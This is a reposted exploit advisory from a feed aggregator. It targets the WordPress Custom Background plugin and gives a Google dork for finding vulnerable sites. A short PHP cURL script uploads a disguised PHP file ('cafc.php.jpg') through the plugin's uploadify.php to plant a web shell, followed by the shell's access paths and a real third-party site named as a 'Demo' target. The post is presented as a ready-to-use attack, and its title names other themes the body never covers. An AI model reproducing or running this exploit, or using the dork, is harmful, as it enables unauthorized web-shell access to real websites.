Quantcast
Channel: Linux Feed » REMOTE SHELL UPLOAD
Viewing all articles
Browse latest Browse all 7

WordPress Vithy / Appius / Dagda / Vector / Shotzz Shell Upload

0
0
######################################################################################
# Exploit Title   : WordPress Custom Background Shell Upload
# Google Dork     : inurl:"/wp-content/plugins/custom-background/"
# Date            : 23-03-2014
# Exploit Author  : CaFc Versace
# Tested on       : Windows 7
# Contact         : dwi[@]cooyy.net, cafc[@]surabayablackhat.org
#######################################################################################
 
 
Prooft:
-------------------------------------------------------------------------------------
<?php
$uploadfile="cafc.php.jpg";
$ch =
curl_init("http://127.0.0.1/wp-content/plugins/custom-background/uploadify/uploadify.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
         array('Filedata'=>"@$uploadfile",
'folder'=>'/wp-content/plugins/custom-background/uploadify/'));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>
-------------------------------------------------------------------------------------
 
 
Exploit:
-------------------------------------------------------------------------------------
Shell Access        : http://localhost/wp-content/plugins/custom-background/uploadify/cafc.php.jpg
or find ur shell at : http://localhost/wp-content/uploads/[years]/[month]/
---------------------------------------------------------------------------------------
Demo                : http://lakeofthewoodsmn.com/wp-content/plugins/custom-background/uploadify/uploadify.php
---------------------------------------------------------------------------------------
 
 
Credits: Agency CaFc
Thanks : SurabayaBlackhat
 
 
./learn to be better

(432)


Viewing all articles
Browse latest Browse all 7

Latest Images

Trending Articles





Latest Images